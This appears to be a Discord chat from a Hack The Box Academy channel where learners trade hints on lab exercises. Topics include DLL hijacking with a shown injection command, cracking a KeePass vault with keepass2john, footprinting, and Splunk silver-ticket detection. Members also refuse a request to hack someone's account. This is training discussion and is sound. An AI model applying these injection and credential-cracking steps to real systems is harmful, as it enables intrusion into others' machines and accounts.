I am doing the medium Footprinting lab right now and found some database user credentials, but I don't see any open SQL databases. I guess it may be an internally hosted database only but I don't seem to have the creds to login via winrm to check for that and login to the db. Am I missing something?

Then you better footprint some login details :)

lmao I will keep looking

reading the brief and doing some nmap stuff will show you open ports

¯_(ツ)_/¯

juts got it -_-

Probably should have realized this earlier lol

also iirc that one (once RDP in) you need to do some digging around to find creds for SQL

Bump? #modules message

Casing is important sometimes.

still working or just hanging out?

Just hanging, but like to help if I can

ah I see, happy holidays 🎉

You too

Hey i'm having some problems in the module Windows Event Logs & Finding Evil in the section Analyzing Evil With Sysmon & Event Logs. I don't really understand how to do the dll injection if someone can dm me it would be easier 🙂

The question is Replicate the DLL hijacking attack described in this section and provide the SHA256 hash of the malicious WININET.dll as your answer. "C:\Tools\Sysmon" and "C:\Tools\Reflective DLLInjection" on the spawned target contain everything you need.

Especially in a linux context

||I did this command in cmd calc.exe 7 C:\WININET.dll the calculator open but it doesnt seem like its injecting the dll since i dont get the hello world and the hash i'm entering is wrong||

Life or Death?

Please read #rules and #welcome and ensure this channel stays on topic.

Is it a module related issue?

Have you tried to HTB Academy forums?

How about google

or heck even chatGPT

Nah bruh

Wrong neighborgood, sry.

Hey guys im currently on Password Attacks Lab - Hard and Ive found a Logins.kdbx file and ive cracked it and Got the password Qwert*** but ti doesnt work for the user david what am i doing wrong?

Hehe, KDBX, what program you know of uses those password DB files?

i used keepass2john to cturn it into a hash

someone please kick this person

You can contact the police. We cannot help you.

did you open the vault

I only know KDBX because we used to use it at work, but it got replaced with a commercial solution.

Wdym? Ive tried to smb into davids share but it shows the password is wrong

So a vault typically contains?

a software vault

maybe the pw you are using is for the vault and not the user acc

that should give you enough info.

HTB blows my mind with how well their modules apply to the real world.

what is a vauly wdym

won't give you any more, you have the file type already just use google

and what xre0us said

you should look up what's a kdbx file

its a keepass file right?

maybe

Yeah exactly ive got the hash using keepass2john and i cracked the hash but it doersnt work

doesn't work on the share?

nope

it's not supposed to

ive checked a online walktrhough and thats what they do it just doiesnt work for me because im stuck

again, did you open the vault?

Is this part of the pen test path?

please explain im genuinly confused

yeah

Ez cubes.

is the vault lssas hklm sam or whatever?

negative good sir

Is that a yes or no

negative = no

Your messing with my brain please

good = postitivve

not really, affirmative = yes

Please someone give me a hint atleast

google what a kdbx file is and what it can contain

ok

Yea take above advice it's easy

i feel stupid asf

You're really overlooking the obvious dude

😆

Hahahahahahaha

Someone the other day legit did the same thing

Yeah alr i got it now it was a stupid mistake

Best steps when you start getting frustrated is to step back and re-evaluate

yup

another thing I would suggest is when you try to harvest hashes from something and crack it, understand what that thing is first

Tbh your first mistake was following a guide

For the skills assessments if you need to follow a guide you already failed yourself

I haven't really run into a skill assessment that's tactics weren't covered by the material

Guides for tier0 content are permitted to be posted

I've considered doing guides for them as a side thing

¯_(ツ)_/¯

I mean if you find it just report it to htb, and they can take actions :p

the goals of the modules aren't to complete them as fast as possible. It's to actually learn the material ¯_(ツ)_/¯

Getting nudged in the right direction or affirming that you're on the right path isn't bad

You wanna check boxes, buy some graph paper and a pencil. You wanna learn? Work through it and grow

I had some brain dead moments when I just jumped straight back into ad enum module

Which is why I'm taking the effort to re-do the earlier sections. (Ldapsearch )

It also helps me reaffirm techniques that would help me later

Always good to recap, and that moment when you're running through and realise "shit, I know this". It's a great feeling.

Yeah because doing it in windows was natural, but doing it in Linux was so foreign (even though it was the same damn thing ) I also tend to mess with the commands to learn what I can also search for

Like learning "hey I can just have it output x,y,z from the search instead of a wall of text to parse"

Module - Intro to windows command line
section - skills assessment
How many hidden files exist on user3's Desktop?

it is not working

0 is not the answer

are you using the right user? what happens when you run the command without .count

yes

Also that command is missing a flag for hidden

Oh nvm

Try doing it without the .count

And see

I got the answer but I wanna show it for a second

I will delete it then

Not sure if this is the appropriate place to ask this but on HTB where do people recommend starting out. I have no prior pen experience. Started IT this year so only got the 1 year help desk support primarily on Windows with a lil Mac, also done MS certs AZ-900/SC-900 and ISC2 CC. So just wondering if HTB is a good start point

Academy has an infosec Fundamentals course

see fast

did you see the answer?

Who do you want us to hack this time

yeah I know what the answer is

Am I crazy or is the question wrong?

Cheers, I will check that out

¯_(ツ)_/¯

Did you read the #rules

dude

If it's a fake account who's to say they didn't register it under a fake name

that's illegal, no one here is going to do that, reavaluate your childish behaviour and find something better to do with your time

It falls under illegal activities, just report it to insta and block them

how's the question wrong

Don't make me pull out the ping that brings in the mods

Ok?

then turn to the police 🤷

its asking me for hidden file but I used
(get-childitem).count

[We are not helping you]

This is the last time we are telling you

This isn't a hacker4hire server

Not here

might be a problem with the target, the files should be hidden

and any server like that will probably scam you out of your money, happily

And most of those end up being scams anyway

yep anyways I got the answer

so do I need to report it to support?

Sad, good luck

I have a question regarding mounts. Do connected devices automatically go to SCSI Disks available such as /dev/sdb? And then in order to access the device you have to mount it to a folder. Am I missing anything?

Marcie like "then perish"

no just reset it and try again

ok

I mean, reality of it is: be careful what you put on the internet, and who you share it with

If any explicit photos of me got leaked I shrimply would not care, as the moment it left my storage device to go to somewhere else - control is no longer mine

it sucks majorly, but only thing to do is report it wherever applicable

revenge hacking or whatever people imagine wouldn't make it disappear

I believe in keeping it strictly to the brain. Or in a safe if its really something once in a lifetime.

devs added a terminate button on the target. feels good to save resources

¯_(ツ)_/¯

I mean it's good for completely ending the target and starting a new one instead of hoping 'reset' fixes it

now I can sleep tight knowing I am not making any waste. thanks guys for the help and merry christmas

They die on their own anyway

well thats life

Deteciting windows Attacks with Splunk

Detecting Golden Tickets/Silver Tickets:

For which "service" did the user named Barbi generate a silver ticket?

a bit lost on how to find this service

got the right answer... not using splunk, but checking one of the screenshots of them demonstrating the attack... not sure if that's the intended route. Question is, how to find out which service the ticket is for through splunk

Silver ticket?

never heard of it but thats like on of the last modules

when i get there ill help you out xdd

You have some resources available in the module that you can use with Splunk to investigate. Go from there

The process you need is covered in the module section

The section mentioned a users.csv file. That wasn't the problem.

Thanks for the disposition. Hope you reach your goals soon

TBH, you'll figure it out b4 i reach my "goal"

Definintely not the intended way, and the module taught the steps to find the intended, but have raised this point with the team.

Can't go any faster than I am.

Excellent observation though 😉

Saturdays and Sundays are dedicated to HTB

I work 110 hours every 2 weeks on average, because my co-workers call out sick and I take their shift to make sure we have coverage.

Coverage for silly AF issues btw

I used both queries shown in the silver ticket option but ticket service isn't one of the fields. Am I being too close minded?

I looked at the associated logs, I filtered by account_name barbi, but couldn't find it

Which is why I'm even doing this in the first place.

Oh you need a PW reset on Saturday because you were to damn lazy to use self-service?
But I digress, going to STFU now because this channel is about modules.

That sucks man

Appreciate your reaction.

Lol. I see you're frustrated. At least it seems it's fueling you to keep going

You in a real Cyber Role?

Nope

Hell even tuning alerts for SIEMs.

Reviewing phising emails, lmao.

It really is, motivation fueled by anger is only short term, but it's good while it works.

Step by step. Which module are you on?

What a thoughtful question, thanks for asking, I am on Windows Attack And Defense, in the SOC Analyst Tier 1 Path, sounds like you are doing the same but you are almost at the end.

I have my CYSA+ scheduled for Jan 12th but honest CompTIA certs are Vocab tests I have learned more on HTB Academy platform that Sec+, CySA+ and CCNA combined.

Yesterday I had the most fun I have ever had going through a module.

Kinda intimidated by the report section, but I know if I can do it, then it will be worth it.

Glad this discord and the company in general exist.

You're in a similar spot as I was, hmm 2 weeks ago. I was on windows attack and defense taking the CySa+ keep at it. Cysa+ is more widely known.

Regarding the report... Hehe I'll only be able to coment once I finish the exam

LOL.

You can always write a mock report and get practice.

Indeed brother, I think you can practice with the approved platform they use before hand, but yea Sec+ is like bare bones minimum for a hiring manager to even entertain hiring you, did you pass the CySA+?

^this

Yup. Passed it 2 weeks ago. Got a 760, passing is 750 😅

Lmao, it was probably mostly theory, I know there's an NDA so you don't have to answer, but going through HTB's CDSA I feel like the CYSA+ should be child's play.

No point to spring for a CASP+ until you land a cyber def/off job anyway, and in that case may as well go for CISSP.

I am only getting it to renew my Sec+.

Congratz btw.

They don't completely overlap. But I'd say the CySa+ was ok. Although I've heard people saying it's child's play. Cdsa helps a bit with it

Anyone ever used the pwn box on mobile?

Yea imo hands on always trumps theory. Even if you don't understand fully what commands you are issuing.

Recomending this coversation be moved over to #cdsa or #careers-and-certs.

This is on topic right? Lol

There's a pwnbox channel.

But to answer your question no i have not.

Giving you a DM @supple gorge .. can't guarantee I can help, but will nudge if I can

Thanks 🙂